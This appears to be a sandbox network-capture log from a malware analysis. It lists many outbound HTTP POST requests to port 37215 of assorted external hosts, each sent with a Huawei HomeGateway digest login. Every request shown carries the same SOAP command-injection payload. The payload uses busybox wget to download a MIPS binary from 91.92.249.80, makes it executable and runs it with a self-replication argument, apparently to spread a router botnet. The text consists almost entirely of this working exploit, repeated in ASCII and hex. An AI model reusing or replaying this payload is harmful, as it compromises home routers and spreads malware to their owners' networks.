                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          562192.168.2.233699478.151.35.18637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196854115 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          563192.168.2.234428841.237.68.837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196857929 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          564192.168.2.2355976157.5.220.23037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196901083 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          565192.168.2.2356654197.146.255.3637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196903944 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          566192.168.2.2335928157.125.231.10037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196933031 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          567192.168.2.2336484197.82.165.2637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196933031 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          568192.168.2.233834241.131.63.4737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196964979 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          569192.168.2.2337380197.219.80.5737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.197211981 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          570192.168.2.2356870197.252.22.20737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.197300911 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          571192.168.2.234473041.249.37.2237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.197305918 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          572192.168.2.235167241.45.19.17337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.197309017 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
